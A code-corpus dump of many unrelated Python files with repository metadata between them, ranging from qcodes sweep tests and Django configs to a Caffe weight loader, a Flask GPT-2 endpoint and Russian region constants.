c0[5:15:1]
with pytest.raises(ValueError):
c0[5.0:15.0:1.0]
with pytest.raises(ValueError):
c0[-12]
with pytest.raises(ValueError):
c0[-5, 12, 5]
with pytest.raises(ValueError):
c0[-5, 12:8:1, 5]
# cannot combine SweepValues for different parameters
with pytest.raises(TypeError):
c0[0.1] + c1[0.2]
# improper use of extend
with pytest.raises(TypeError):
c0[0.1].extend(5)
# SweepValue object has no getter, even if the parameter does
with pytest.raises(AttributeError):
c0[0.1].get
def test_valid(c0):
c0_sv = c0[1]
# setter gets mapped
assert c0_sv.set == c0.set
# normal sequence operations access values
assert list(c0_sv) == [1]
assert c0_sv[0] == 1
assert 1 in c0_sv
assert not (2 in c0_sv)
# in-place and copying addition
c0_sv += c0[1.5:1.8:0.1]
c0_sv2 = c0_sv + c0[2]
assert list(c0_sv) == [1, 1.5, 1.6, 1.7]
assert list(c0_sv2) == [1, 1.5, 1.6, 1.7, 2]
# append and extend
c0_sv3 = c0[2]
# append only works with straight values
c0_sv3.append(2.1)
# extend can use another SweepValue, (even if it only has one value)
c0_sv3.extend(c0[2.2])
# extend can also take a sequence
c0_sv3.extend([2.3])
# as can addition
c0_sv3 += [2.4]
c0_sv4 = c0_sv3 + [2.5, 2.6]
assert list(c0_sv3) == [2, 2.1, 2.2, 2.3, 2.4]
assert list(c0_sv4) == [2, 2.1, 2.2, 2.3, 2.4, 2.5, 2.6]
# len
assert len(c0_sv3) == 5
# in-place and copying reverse
c0_sv.reverse()
c0_sv5 = reversed(c0_sv)
assert list(c0_sv) == [1.7, 1.6, 1.5, 1]
assert list(c0_sv5) == [1, 1.5, 1.6, 1.7]
# multi-key init, where first key is itself a list
c0_sv6 = c0[[1, 3], 4]
# copying
c0_sv7 = c0_sv6.copy()
assert list(c0_sv6) == [1, 3, 4]
assert list(c0_sv7) == [1, 3, 4]
assert not (c0_sv6 is c0_sv7)
def test_base():
p = Parameter('p', get_cmd=None, set_cmd=None)
with pytest.raises(NotImplementedError):
iter(SweepValues(p))
def test_snapshot(c0):
assert c0[0].snapshot() == {
'parameter': c0.snapshot(),
'values': [{'item': 0}]
}
assert c0[0:5:0.3].snapshot()['values'] == [{
'first': 0,
'last': 4.8,
'num': 17,
'type': 'linear'
}]
sv = c0.sweep(start=2, stop=4, num=5)
assert sv.snapshot()['values'] == [{
'first': 2,
'last': 4,
'num': 5,
'type': 'linear'
}]
# mixture of bare items, nested lists, and slices
sv = c0[1, 7, 3.2, [1, 2, 3], 6:9:1, -4.5, 5.3]
assert sv.snapshot()['values'] == [{
'first': 1,
'last': 5.3,
'min': -4.5,
'max': 8,
'num': 11,
'type': 'sequence'
}]
assert (c0[0] + c0[1]).snapshot()['values'] == [
{'item': 0},
{'item': 1}
]
assert (c0[0:3:1] + c0[4, 6, 9]).snapshot()['values'] == [
{'first': 0, 'last': 2, 'num': 3, 'type': 'linear'},
{'first': 4, 'last': 9, 'min': 4, 'max': 9, 'num': 3,
'type': 'sequence'}
]
def test_repr(c0):
sv = c0[0]
assert repr(sv) == (
f'<qcodes.instrument.sweep_values.SweepFixedValues: c0 at {id(sv)}>'
)
| 25.235632
| 76
| 0.566614
| 0
| 0
| 258
| 0.058757
| 339
| 0.077203
| 0
| 0
| 1,145
| 0.260761
|
b2920a5b35fa8d9589396ec223bdc4d33e30fd7a
| 350
|
py
|
Python
|
src/django_powerdns_api/urls.py
|
andrzej-jankowski/django-powerdns-api
|
c7bc793022ba9fde2dd0e3564c3c63398611540b
|
[
"Apache-2.0"
] | null | null | null |
src/django_powerdns_api/urls.py
|
andrzej-jankowski/django-powerdns-api
|
c7bc793022ba9fde2dd0e3564c3c63398611540b
|
[
"Apache-2.0"
] | null | null | null |
src/django_powerdns_api/urls.py
|
andrzej-jankowski/django-powerdns-api
|
c7bc793022ba9fde2dd0e3564c3c63398611540b
|
[
"Apache-2.0"
] | null | null | null |
# -*- encoding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from django.conf.urls import patterns, include, url
from django_powerdns_api.routers import router
urlpatterns = patterns(
'',
url(r'^', include(router.urls)),
)
| 20.588235
| 51
| 0.768571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 31
| 0.088571
|
b292be09587a07ede608a3607cc6852e3db17188
| 925
|
py
|
Python
|
tools/SDKTool/src/WrappedDeviceAPI/deviceAPI/mobileDevice/android/plugin/Platform_plugin/PlatformWeTest/__init__.py
|
Passer-D/GameAISDK
|
a089330a30b7bfe1f6442258a12d8c0086240606
|
[
"Apache-2.0"
] | 1,210
|
2020-08-18T07:57:36.000Z
|
2022-03-31T15:06:05.000Z
|
tools/SDKTool/src/WrappedDeviceAPI/deviceAPI/mobileDevice/android/plugin/Platform_plugin/PlatformWeTest/__init__.py
|
guokaiSama/GameAISDK
|
a089330a30b7bfe1f6442258a12d8c0086240606
|
[
"Apache-2.0"
] | 37
|
2020-08-24T02:48:38.000Z
|
2022-01-30T06:41:52.000Z
|
tools/SDKTool/src/WrappedDeviceAPI/deviceAPI/mobileDevice/android/plugin/Platform_plugin/PlatformWeTest/__init__.py
|
guokaiSama/GameAISDK
|
a089330a30b7bfe1f6442258a12d8c0086240606
|
[
"Apache-2.0"
] | 275
|
2020-08-18T08:35:16.000Z
|
2022-03-31T15:06:07.000Z
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making GameAISDK available.
This source code file is licensed under the GNU General Public License Version 3.
For full details, please refer to the file "LICENSE.txt" which is provided as part of this source code package.
Copyright (C) 2020 THL A29 Limited, a Tencent company. All rights reserved.
"""
import platform
__is_windows_system = platform.platform().lower().startswith('window')
__is_linux_system = platform.platform().lower().startswith('linux')
if __is_windows_system:
from .demo_windows.PlatformWeTest import PlatformWeTest
from .demo_windows.common.AdbTool import AdbTool
elif __is_linux_system:
from .demo_ubuntu16.PlatformWeTest import PlatformWeTest
from .demo_ubuntu16.common.AdbTool import AdbTool
else:
raise Exception('system is not support!')
def GetInstance():
return PlatformWeTest()
| 35.576923
| 111
| 0.776216
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 429
| 0.463784
|
b293b0671b5147e6e833e70a808c61e5033f825f
| 579
|
py
|
Python
|
python/codingbat/src/sum_double.py
|
christopher-burke/warmups
|
140c96ada87ec5e9faa4622504ddee18840dce4a
|
[
"MIT"
] | null | null | null |
python/codingbat/src/sum_double.py
|
christopher-burke/warmups
|
140c96ada87ec5e9faa4622504ddee18840dce4a
|
[
"MIT"
] | 2
|
2022-03-10T03:49:14.000Z
|
2022-03-14T00:49:54.000Z
|
python/codingbat/src/sum_double.py
|
christopher-burke/warmups
|
140c96ada87ec5e9faa4622504ddee18840dce4a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""sum_double
Given two int values, return their sum.
Unless the two values are the same, then return double their sum.
sum_double(1, 2) → 3
sum_double(3, 2) → 5
sum_double(2, 2) → 8
source: https://codingbat.com/prob/p141905
"""
def sum_double(a: int, b: int) -> int:
"""Sum Double.
Return the sum or if a == b return double the sum.
"""
multiply = 1
if a == b:
multiply += 1
return (a + b) * multiply
if __name__ == "__main__":
print(sum_double(1, 2))
print(sum_double(3, 2))
print(sum_double(2, 2))
| 18.09375
| 65
| 0.618307
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 349
| 0.596581
|
b293c4e951eab343a95232f50c197cd3ae253ad6
| 126
|
py
|
Python
|
database_email_backend/__init__.py
|
enderlabs/django-database-email-backend
|
aad6bade66d076b5425f772430adc7e77e60f5ce
|
[
"MIT"
] | 1
|
2016-01-15T18:54:59.000Z
|
2016-01-15T18:54:59.000Z
|
database_email_backend/__init__.py
|
enderlabs/django-database-email-backend
|
aad6bade66d076b5425f772430adc7e77e60f5ce
|
[
"MIT"
] | 1
|
2015-11-04T22:19:21.000Z
|
2015-11-04T22:19:21.000Z
|
database_email_backend/__init__.py
|
enderlabs/django-database-email-backend
|
aad6bade66d076b5425f772430adc7e77e60f5ce
|
[
"MIT"
] | 4
|
2015-11-04T20:45:16.000Z
|
2021-03-03T06:28:20.000Z
|
# -*- coding: utf-8 -*-
VERSION = (1, 0, 4)
__version__ = "1.0.4"
__authors__ = ["Stefan Foulis <stefan.foulis@gmail.com>", ]
| 25.2
| 59
| 0.611111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 71
| 0.563492
|
b293f0ceac4f743a52151b0799d4e433f9e36af9
| 366
|
py
|
Python
|
src/draw.py
|
mattdesl/inkyphat-mods
|
2867161e66ffce87b75170e081f5ab481ce5e6b1
|
[
"MIT"
] | 7
|
2020-04-25T09:24:18.000Z
|
2022-01-02T03:24:24.000Z
|
src/draw.py
|
mattdesl/inkyphat-mods
|
2867161e66ffce87b75170e081f5ab481ce5e6b1
|
[
"MIT"
] | null | null | null |
src/draw.py
|
mattdesl/inkyphat-mods
|
2867161e66ffce87b75170e081f5ab481ce5e6b1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import argparse
from PIL import Image
from inky import InkyPHAT
print("""Inky pHAT/wHAT: Logo
Displays the Inky pHAT/wHAT logo.
""")
type = "phat"
colour = "black"
inky_display = InkyPHAT(colour)
inky_display.set_border(inky_display.BLACK)
img = Image.open("assets/InkypHAT-212x104-bw.png")
inky_display.set_image(img)
inky_display.show()
| 18.3
| 50
| 0.762295
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 127
| 0.346995
|
b296a32574784e1bd7a3f60cbb896711ff7dd880
| 1,230
|
py
|
Python
|
newsapp/tests.py
|
Esther-Anyona/four-one-one
|
6a5e019b35710941a669c1b49e993b683c99d615
|
[
"MIT"
] | null | null | null |
newsapp/tests.py
|
Esther-Anyona/four-one-one
|
6a5e019b35710941a669c1b49e993b683c99d615
|
[
"MIT"
] | null | null | null |
newsapp/tests.py
|
Esther-Anyona/four-one-one
|
6a5e019b35710941a669c1b49e993b683c99d615
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from .models import *
from django.contrib.auth.models import User
# Create your tests here.
user = User.objects.get(id=1)
profile = Profile.objects.get(id=1)
neighbourhood = Neighbourhood.objects.get(id=1)
class TestBusiness(TestCase):
def setUp(self):
self.business=Business(name = "hardware", description="your stop for best prices", user= profile, neighbourhood_id=neighbourhood, business_email='mail@gmail.com')
self.business.save()
def test_instance(self):
self.assertTrue(isinstance(self.business,Business))
def test_create_business(self):
self.business.create_business()
businesses=Business.objects.all()
self.assertTrue(len(businesses)>0)
def test_delete_business(self):
self.business.delete_business()
businesses=Business.objects.all()
self.assertTrue(len(businesses)==0)
def test_update_business(self):
self.business.create_business()
# self.business.update_business(self.business.id, 'hardware')
updated_business = Business.objects.all()
self.assertTrue(len(updated_business) > 0)
def tearDown(self):
Business.objects.all().delete()
| 30
| 170
| 0.702439
| 978
| 0.795122
| 0
| 0
| 0
| 0
| 0
| 0
| 139
| 0.113008
|
b296bd14330ba64af65527855f690dd49d0a2709
| 4,620
|
py
|
Python
|
ssdlite/load_caffe_weights.py
|
kkrpawkal/MobileNetv2-SSDLite
|
b434ed07b46d6e7f733ec97e180b57c8db30cae3
|
[
"MIT"
] | null | null | null |
ssdlite/load_caffe_weights.py
|
kkrpawkal/MobileNetv2-SSDLite
|
b434ed07b46d6e7f733ec97e180b57c8db30cae3
|
[
"MIT"
] | null | null | null |
ssdlite/load_caffe_weights.py
|
kkrpawkal/MobileNetv2-SSDLite
|
b434ed07b46d6e7f733ec97e180b57c8db30cae3
|
[
"MIT"
] | null | null | null |
import numpy as np
import sys,os
caffe_root = '/home/yaochuanqi/work/ssd/caffe/'
sys.path.insert(0, caffe_root + 'python')
import caffe
deploy_proto = 'deploy.prototxt'
save_model = 'deploy.caffemodel'
weights_dir = 'output'
box_layers = ['conv_13/expand', 'Conv_1', 'layer_19_2_2', 'layer_19_2_3', 'layer_19_2_4', 'layer_19_2_5']
def load_weights(path, shape=None):
weights = None
if shape is None:
weights = np.fromfile(path, dtype=np.float32)
else:
weights = np.fromfile(path, dtype=np.float32).reshape(shape)
os.unlink(path)
return weights
def load_data(net):
for key in net.params.iterkeys():
if type(net.params[key]) is caffe._caffe.BlobVec:
print(key)
if 'mbox' not in key and (key.startswith("conv") or key.startswith("Conv") or key.startswith("layer")):
print('conv')
if key.endswith("/bn"):
prefix = weights_dir + '/' + key.replace('/', '_')
net.params[key][0].data[...] = load_weights(prefix + '_moving_mean.dat')
net.params[key][1].data[...] = load_weights(prefix + '_moving_variance.dat')
net.params[key][2].data[...] = np.ones(net.params[key][2].data.shape, dtype=np.float32)
elif key.endswith("/scale"):
prefix = weights_dir + '/' + key.replace('scale','bn').replace('/', '_')
net.params[key][0].data[...] = load_weights(prefix + '_gamma.dat')
net.params[key][1].data[...] = load_weights(prefix + '_beta.dat')
else:
prefix = weights_dir + '/' + key.replace('/', '_')
ws = np.ones((net.params[key][0].data.shape[0], 1, 1, 1), dtype=np.float32)
if os.path.exists(prefix + '_weights_scale.dat'):
ws = load_weights(prefix + '_weights_scale.dat', ws.shape)
net.params[key][0].data[...] = load_weights(prefix + '_weights.dat', net.params[key][0].data.shape) * ws
if len(net.params[key]) > 1:
net.params[key][1].data[...] = load_weights(prefix + '_biases.dat')
elif 'mbox_loc/depthwise' in key or 'mbox_conf/depthwise' in key:
prefix = key[0:key.find('_mbox')]
index = box_layers.index(prefix)
if 'mbox_loc' in key:
prefix = weights_dir + '/BoxPredictor_' + str(index) + '_BoxEncodingPredictor_depthwise'
else:
prefix = weights_dir + '/BoxPredictor_' + str(index) + '_ClassPredictor_depthwise'
if key.endswith("/bn"):
net.params[key][0].data[...] = load_weights(prefix + '_bn_moving_mean.dat')
net.params[key][1].data[...] = load_weights(prefix + '_bn_moving_variance.dat')
net.params[key][2].data[...] = np.ones(net.params[key][2].data.shape, dtype=np.float32)
elif key.endswith("/scale"):
net.params[key][0].data[...] = load_weights(prefix + '_gamma.dat')
net.params[key][1].data[...] = load_weights(prefix + '_beta.dat')
else:
print key
net.params[key][0].data[...] = load_weights(prefix + '_weights.dat', net.params[key][0].data.shape)
if len(net.params[key]) > 1:
net.params[key][1].data[...] = load_weights(prefix + '_biases.dat')
elif key.endswith("mbox_loc"):
prefix = key.replace("_mbox_loc", "")
index = box_layers.index(prefix)
prefix = weights_dir + '/BoxPredictor_' + str(index) + '_BoxEncodingPredictor'
net.params[key][0].data[...] = load_weights(prefix + '_weights.dat', net.params[key][0].data.shape)
net.params[key][1].data[...] = load_weights(prefix + '_biases.dat')
elif key.endswith("mbox_conf"):
prefix = key.replace("_mbox_conf", "")
index = box_layers.index(prefix)
prefix = weights_dir + '/BoxPredictor_' + str(index) + '_ClassPredictor'
net.params[key][0].data[...] = load_weights(prefix + '_weights.dat', net.params[key][0].data.shape)
net.params[key][1].data[...] = load_weights(prefix + '_biases.dat')
else:
print ("error key " + key)
net_deploy = caffe.Net(deploy_proto, caffe.TEST)
load_data(net_deploy)
net_deploy.save(save_model)
| 54.352941
| 124
| 0.541775
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 823
| 0.178139
|
b2977674be0d43e625cea5afb3180e9f200426a4
| 996
|
py
|
Python
|
qa327/frontend/exceptions.py
|
rickyzhangca/CISC-327
|
e419caafa6ae3fe77aa411228b6b58b237fe6a61
|
[
"MIT"
] | null | null | null |
qa327/frontend/exceptions.py
|
rickyzhangca/CISC-327
|
e419caafa6ae3fe77aa411228b6b58b237fe6a61
|
[
"MIT"
] | 39
|
2020-10-11T02:31:14.000Z
|
2020-12-15T20:18:56.000Z
|
qa327/frontend/exceptions.py
|
rickyzhangca/CISC-327
|
e419caafa6ae3fe77aa411228b6b58b237fe6a61
|
[
"MIT"
] | 1
|
2020-10-17T02:44:43.000Z
|
2020-10-17T02:44:43.000Z
|
'''
This is the exceptions module:
'''
'''
Exception of when user do not have the access to certain pages.
'''
class CannotAccessPageException(Exception):
pass
'''
Exception of the first password and the second password does not match during registration.
'''
class PasswordsNotMatchingException(Exception):
pass
'''
Exception of when the user input format is wrong.
'''
class WrongFormatException(Exception):
def __init__(self, message=''):
super().__init__('{}, format is incorrect.'.format(message))
'''
Exception of when the ticket name is wrong.
'''
class WrongTicketNameException(Exception):
pass
'''
Exception of when the ticket quantity is wrong.
'''
class WrongTicketQuantityException(Exception):
pass
'''
Exception of when the ticket quantity is wrong.
'''
class WrongTicketPriceException(Exception):
pass
'''
Exception of when the email already exists in user data (already registered).
'''
class EmailAlreadyExistsException(Exception):
pass
| 21.191489
| 91
| 0.736948
| 463
| 0.464859
| 0
| 0
| 0
| 0
| 0
| 0
| 539
| 0.541165
|
b299f61f9bab8f0fdfd0cbba6dbcac61cd8b37ce
| 239
|
py
|
Python
|
dags/minimal_dag.py
|
MarcusJones/kaggle_petfinder_adoption
|
2d745b48405f4d4211b523eae272b9169fcf9fa2
|
[
"MIT"
] | 1
|
2019-01-24T04:22:39.000Z
|
2019-01-24T04:22:39.000Z
|
dags/minimal_dag.py
|
MarcusJones/kaggle_petfinder_adoption
|
2d745b48405f4d4211b523eae272b9169fcf9fa2
|
[
"MIT"
] | null | null | null |
dags/minimal_dag.py
|
MarcusJones/kaggle_petfinder_adoption
|
2d745b48405f4d4211b523eae272b9169fcf9fa2
|
[
"MIT"
] | null | null | null |
import airflow as af
from airflow.operators.dummy_operator import DummyOperator
from datetime import datetime
with af.DAG('minimal_dag', start_date=datetime(2016, 1, 1)) as dag:
op = DummyOperator(task_id='op')
op.dag is dag # True
| 23.9
| 67
| 0.76569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 23
| 0.096234
|
b29ab73d546b03f1d056e040fdce2adc50067aef
| 2,567
|
py
|
Python
|
app.py
|
paulinaacostac/GPT2
|
4d06584b2e8adfa708f1306e38dadd48c899ac8a
|
[
"MIT"
] | 2
|
2022-01-06T17:48:58.000Z
|
2022-01-06T18:23:31.000Z
|
app.py
|
paulinaacostac/gpt2-WebAPI
|
4d06584b2e8adfa708f1306e38dadd48c899ac8a
|
[
"MIT"
] | null | null | null |
app.py
|
paulinaacostac/gpt2-WebAPI
|
4d06584b2e8adfa708f1306e38dadd48c899ac8a
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import json
import os
import numpy as np
import tensorflow.compat.v1 as tf
from src import model, sample, encoder
from flask import Flask
from flask import request, jsonify
import time
######model
def interact_model(
model_name='run1',
seed=None,
nsamples=1,
batch_size=1,
length=None,
temperature=1,
top_k=0,
top_p=1,
models_dir='checkpoint',
):
models_dir = os.path.expanduser(os.path.expandvars(models_dir))
if batch_size is None:
batch_size = 1
assert nsamples % batch_size == 0
enc = encoder.get_encoder(model_name, models_dir)
hparams = model.default_hparams()
with open(os.path.join(models_dir, model_name, 'hparams.json')) as f:
hparams.override_from_dict(json.load(f))
if length is None:
length = hparams.n_ctx // 2
elif length > hparams.n_ctx:
raise ValueError("Can't get samples longer than window size: %s" % hparams.n_ctx)
with tf.Session(graph=tf.Graph()) as sess:
context = tf.placeholder(tf.int32, [batch_size, None])
np.random.seed(seed)
tf.set_random_seed(seed)
output = sample.sample_sequence(
hparams=hparams, length=length,
context=context,
batch_size=batch_size,
temperature=temperature, top_k=top_k, top_p=top_p
)
saver = tf.train.Saver()
ckpt = tf.train.latest_checkpoint(os.path.join(models_dir, "run1"))
saver.restore(sess, ckpt)
yield sess, context, output, enc
def output_something(bio, sess, context, output, enc):
raw_text = bio#input("Model prompt >>> ")
context_tokens = enc.encode(raw_text)
generated = 0
out = sess.run(output, feed_dict={
context: [context_tokens for _ in range(1)]
})[:, len(context_tokens):] #Get samples
text = enc.decode(out[0]) #decodes samples
print(text)
return text
########API
gen = interact_model()
sess, context, output, enc = next(gen)
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def welcome():
start_time = time.time()
bio = request.args.get('bio')
res = output_something(bio, sess, context, output, enc)
sentences = res.split("\n")[:3]
print("----------------------------------------------------------- %s seconds ----------------------------------------------" % (time.time() - start_time))
return jsonify(sentences=sentences)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=105)
| 26.463918
| 159
| 0.603039
| 0
| 0
| 1,324
| 0.515777
| 420
| 0.163615
| 0
| 0
| 346
| 0.134788
|
b29b61190657129eadf2448fe993cb4e944db000
| 1,096
|
py
|
Python
|
t/unit/utils/test_div.py
|
kaiix/kombu
|
580b5219cc50cad278c4b664d0e0f85e37a5e9ea
|
[
"BSD-3-Clause"
] | 1,920
|
2015-01-03T15:43:23.000Z
|
2022-03-30T19:30:35.000Z
|
t/unit/utils/test_div.py
|
kaiix/kombu
|
580b5219cc50cad278c4b664d0e0f85e37a5e9ea
|
[
"BSD-3-Clause"
] | 949
|
2015-01-02T18:56:00.000Z
|
2022-03-31T23:14:59.000Z
|
t/unit/utils/test_div.py
|
kaiix/kombu
|
580b5219cc50cad278c4b664d0e0f85e37a5e9ea
|
[
"BSD-3-Clause"
] | 833
|
2015-01-07T23:56:35.000Z
|
2022-03-31T22:04:11.000Z
|
import pickle
from io import BytesIO, StringIO
from kombu.utils.div import emergency_dump_state
class MyStringIO(StringIO):
def close(self):
pass
class MyBytesIO(BytesIO):
def close(self):
pass
class test_emergency_dump_state:
def test_dump(self, stdouts):
fh = MyBytesIO()
stderr = StringIO()
emergency_dump_state(
{'foo': 'bar'}, open_file=lambda n, m: fh, stderr=stderr)
assert pickle.loads(fh.getvalue()) == {'foo': 'bar'}
assert stderr.getvalue()
assert not stdouts.stdout.getvalue()
def test_dump_second_strategy(self, stdouts):
fh = MyStringIO()
stderr = StringIO()
def raise_something(*args, **kwargs):
raise KeyError('foo')
emergency_dump_state(
{'foo': 'bar'},
open_file=lambda n, m: fh,
dump=raise_something,
stderr=stderr,
)
assert 'foo' in fh.getvalue()
assert 'bar' in fh.getvalue()
assert stderr.getvalue()
assert not stdouts.stdout.getvalue()
| 23.319149
| 69
| 0.595803
| 990
| 0.903285
| 0
| 0
| 0
| 0
| 0
| 0
| 45
| 0.041058
|
b29c8d36ba3db7e707e861825377dec464aebc9b
| 3,754
|
py
|
Python
|
intents/oversights/more_than_just_topk.py
|
googleinterns/debaised-analysis
|
0dad1186a177a171956a33c49999d9387b9f989d
|
[
"Apache-2.0"
] | 1
|
2020-06-26T19:16:15.000Z
|
2020-06-26T19:16:15.000Z
|
intents/oversights/more_than_just_topk.py
|
bhagyakjain/debaised-analysis
|
6b8b27575bf3f60a6711e370bfad838e29f5cc8a
|
[
"Apache-2.0"
] | 30
|
2020-06-01T13:42:25.000Z
|
2022-03-31T03:58:55.000Z
|
intents/oversights/more_than_just_topk.py
|
googleinterns/debaised-analysis
|
0dad1186a177a171956a33c49999d9387b9f989d
|
[
"Apache-2.0"
] | 10
|
2020-06-10T05:43:59.000Z
|
2020-08-20T10:32:24.000Z
|
"""
Copyright 2020 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
"""This module implements detection of the more than just topk oversight
in the top-k intent.
More_than_just_topk is the oversight which arises when the user misses
rows after the kth row that have metric equal-to or close-by the kth row.
Here we use the difference with the kth row normalized by the standard
deviation of top-k to decide if any row is similar to the
"""
from util import constants, enums
def more_than_just_topk(result_table, k, metric):
"""This function gives suggestions if 'more than just top-k' oversight is
detected in the results generated by the top-k.
This function gives suggestions to increasse k if some of the rows after
the kth row are very similar to the kth row.
Parameter used to decide if a row is similar to the kth row.
absolute value of (row - kth_row) / std_dev
standard deviation is calculated for the top-k rows only
std_dev -> standard deviation of metric of the top-k rows
row, kth_row -> value of metric of the considered row
The cut-off is fixed in the util/constants module
Args:
topk_results: Type-pandas dataframe
contain the results without cropping rows not in top-k.
k: integer
It is the number of entries to be taken in the top-k results.
metric: str
It is the column name of the metric column
Returns:
suggestion : dictonary with keys 'suggestion', 'oversight_name',
'change_list', 'confidence_score'.
change_list is an efficient way of encoding the new suggested query
json that we suggest the user to try.
"""
num_rows = result_table.shape[0]
# No suggestion if all rows already in the result
if k >= num_rows or k == -1:
return
# standard deviation of top k rows
standard_deviation_topk = None
if k == 1:
standard_deviation_topk = 0
else:
standard_deviation_topk = result_table[:k][metric].std()
# lower bound & upper bound for the value of metric
val_lower_bound = result_table[metric][k - 1] - standard_deviation_topk * constants.MORE_THAN_JUST_TOPK_THRESHOLD
val_upper_bound = result_table[metric][k - 1] + standard_deviation_topk * constants.MORE_THAN_JUST_TOPK_THRESHOLD
# init the k in suggested query as k in original query
new_k = k
confidence_score = 0
for row in range(k, num_rows):
# value of metric at row
val = result_table[metric][row]
if val_lower_bound <= val and val <= val_upper_bound:
new_k = row + 1
else:
break
if standard_deviation_topk == 0:
return
confidence_score = abs(result_table[metric][new_k - 1] - result_table[metric][k - 1]) / standard_deviation_topk
if new_k != k:
change_list = {'topKLimit':new_k}
suggestion = {}
suggestion['change_list'] = change_list
suggestion['suggestion'] = 'value of ' + metric + ' in some rows after the top-k is similar to the Kth row'
suggestion['confidence_score'] = confidence_score
suggestion['oversight'] = enums.Oversights.MORE_THAN_JUST_TOPK
return suggestion
else:
return
| 37.168317
| 117
| 0.697389
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,441
| 0.65024
|
b29d27c7cb2d0e54f4f91d86ff0c6d726cd311a6
| 733
|
py
|
Python
|
release/stubs.min/System/Net/__init___parts/TransportContext.py
|
htlcnn/ironpython-stubs
|
780d829e2104b2789d5f4d6f32b0ec9f2930ca03
|
[
"MIT"
] | 182
|
2017-06-27T02:26:15.000Z
|
2022-03-30T18:53:43.000Z
|
release/stubs.min/System/Net/__init___parts/TransportContext.py
|
htlcnn/ironpython-stubs
|
780d829e2104b2789d5f4d6f32b0ec9f2930ca03
|
[
"MIT"
] | 28
|
2017-06-27T13:38:23.000Z
|
2022-03-15T11:19:44.000Z
|
release/stubs.min/System/Net/__init___parts/TransportContext.py
|
htlcnn/ironpython-stubs
|
780d829e2104b2789d5f4d6f32b0ec9f2930ca03
|
[
"MIT"
] | 67
|
2017-06-28T09:43:59.000Z
|
2022-03-20T21:17:10.000Z
|
class TransportContext(object):
""" The System.Net.TransportContext class provides additional context about the underlying transport layer. """
def GetChannelBinding(self,kind):
"""
GetChannelBinding(self: TransportContext,kind: ChannelBindingKind) -> ChannelBinding
Retrieves the requested channel binding.
kind: The type of channel binding to retrieve.
Returns: The requested System.Security.Authentication.ExtendedProtection.ChannelBinding,or null if the
channel binding is not supported by the current transport or by the operating system.
"""
pass
def GetTlsTokenBindings(self):
""" GetTlsTokenBindings(self: TransportContext) -> IEnumerable[TokenBinding] """
pass
| 31.869565
| 113
| 0.746248
| 731
| 0.997271
| 0
| 0
| 0
| 0
| 0
| 0
| 604
| 0.824011
|
b29e142efe612167f93b68a27b4c24715a4da2ff
| 1,058
|
py
|
Python
|
zkpytb/json.py
|
zertrin/zkpytb
|
066662d9c7bd233f977302cb11cf888a2a1828d2
|
[
"MIT"
] | 2
|
2021-07-17T19:30:17.000Z
|
2022-02-14T04:55:46.000Z
|
zkpytb/json.py
|
zertrin/zkpytb
|
066662d9c7bd233f977302cb11cf888a2a1828d2
|
[
"MIT"
] | null | null | null |
zkpytb/json.py
|
zertrin/zkpytb
|
066662d9c7bd233f977302cb11cf888a2a1828d2
|
[
"MIT"
] | null | null | null |
"""
Helper functions related to json
Author: Marc Gallet
"""
import datetime
import decimal
import json
import uuid
import pathlib
class JSONEncoder(json.JSONEncoder):
"""
A custom JSONEncoder that can handle a bit more data types than the one from stdlib.
"""
def default(self, o):
# early passthrough if it works by default
try:
return json.JSONEncoder.default(self, o)
except Exception:
pass
# handle Path objects
if isinstance(o, pathlib.Path):
return str(o).replace('\\', '/')
# handle UUID objects
if isinstance(o, uuid.UUID):
return str(o)
if isinstance(o, (datetime.datetime, datetime.time, datetime.date)):
return o.isoformat()
if isinstance(o, datetime.timedelta):
return o.total_seconds()
if isinstance(o, (complex, decimal.Decimal)):
return str(o)
# Let the base class default method raise the TypeError
return json.JSONEncoder.default(self, o)
| 27.128205
| 88
| 0.618147
| 921
| 0.87051
| 0
| 0
| 0
| 0
| 0
| 0
| 307
| 0.29017
|
b29e7d32ca4c3f659315bd72acd899c4542a2363
| 1,960
|
py
|
Python
|
back_end/consts.py
|
DoctorChe/crash_map
|
e540ab8a45f67ff78c9993ac3eb1b413d4786cd9
|
[
"MIT"
] | 1
|
2019-04-04T21:55:24.000Z
|
2019-04-04T21:55:24.000Z
|
back_end/consts.py
|
DoctorChe/crash_map
|
e540ab8a45f67ff78c9993ac3eb1b413d4786cd9
|
[
"MIT"
] | 2
|
2019-04-14T10:11:25.000Z
|
2019-04-25T20:49:54.000Z
|
back_end/consts.py
|
DoctorChe/crash_map
|
e540ab8a45f67ff78c9993ac3eb1b413d4786cd9
|
[
"MIT"
] | null | null | null |
# encoding: utf-8
# input data constants
MARI_EL = 'Республика Марий Эл'
YOSHKAR_OLA = 'Республика Марий Эл, Йошкар-Ола'
VOLZHSK = 'Республика Марий Эл, Волжск'
VOLZHSK_ADM = 'Республика Марий Эл, Волжский район'
MOUNTIN = 'Республика Марий Эл, Горномарийский район'
ZVENIGOVO = 'Республика Марий Эл, Звениговский район'
KILEMARY = 'Республика Марий Эл, Килемарский район'
KUZHENER = 'Республика Марий Эл, Куженерский район'
TUREK = 'Республика Марий Эл, Мари-Турекский район'
MEDVEDEVO = 'Республика Марий Эл, Медведевский район'
MORKI = 'Республика Марий Эл, Моркинский район'
NEW_TORYAL = 'Республика Марий Эл, Новоторъяльский район'
